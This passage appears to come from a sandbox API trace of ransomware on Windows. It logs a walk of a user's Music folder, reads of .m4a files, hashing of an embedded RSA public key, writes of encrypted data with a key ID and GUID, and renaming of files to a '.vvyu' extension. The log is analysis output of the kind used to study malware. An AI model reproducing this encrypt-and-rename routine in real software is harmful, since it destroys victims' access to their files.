[0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af2f88 [0189.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dbc8 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0189.834] GetCurrentThreadId () returned 0x5d8 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4848 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.835] GetCurrentThreadId () returned 0x5d8 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af2f88 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3198 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af33b0 [0189.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3198 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33b0 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300fe8 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.844] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x7fdd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x7fdd, lpOverlapped=0x0) returned 1 [0189.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.845] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7fe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.845] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af2f88 [0189.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af2f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af33b8 [0189.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0189.847] WriteFile (in: hFile=0x584, lpBuffer=0x2af33b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af33b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33b8 | out: hHeap=0x2c0000) returned 1 [0189.847] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.847] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.847] CloseHandle (hObject=0x584) returned 1 [0189.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af2f88 [0189.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0189.849] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\85NDX4GNPa9.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\85ndx4gnpa9.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\85NDX4GNPa9.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\85ndx4gnpa9.m4a.vvyu")) returned 1 [0189.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.851] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.853] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1356710, ftCreationTime.dwHighDateTime=0x1d89704, ftLastAccessTime.dwLowDateTime=0x13094d70, ftLastAccessTime.dwHighDateTime=0x1d89e62, ftLastWriteTime.dwLowDateTime=0x13094d70, ftLastWriteTime.dwHighDateTime=0x1d89e62, nFileSizeHigh=0x0, nFileSizeLow=0xf219, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9QfI6h6W74ZaGdKZ7l.m4a", cAlternateFileName="9QFI6H~1.M4A")) returned 1 [0189.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x300fe8 [0189.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300fe8 | out: hHeap=0x2c0000) returned 1 [0189.854] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\9QfI6h6W74ZaGdKZ7l.m4a") returned=".m4a" [0189.854] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\9QfI6h6W74ZaGdKZ7l.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\9qfi6h6w74zagdkz7l.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.854] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=61977) returned 1 [0189.854] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.857] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf1f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.857] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.859] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.859] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xf219, lpOverlapped=0x0) returned 1 [0189.860] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.860] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.860] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.860] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.861] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.861] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.861] CryptGetHashParam (in: hHash=0x2a05de8, 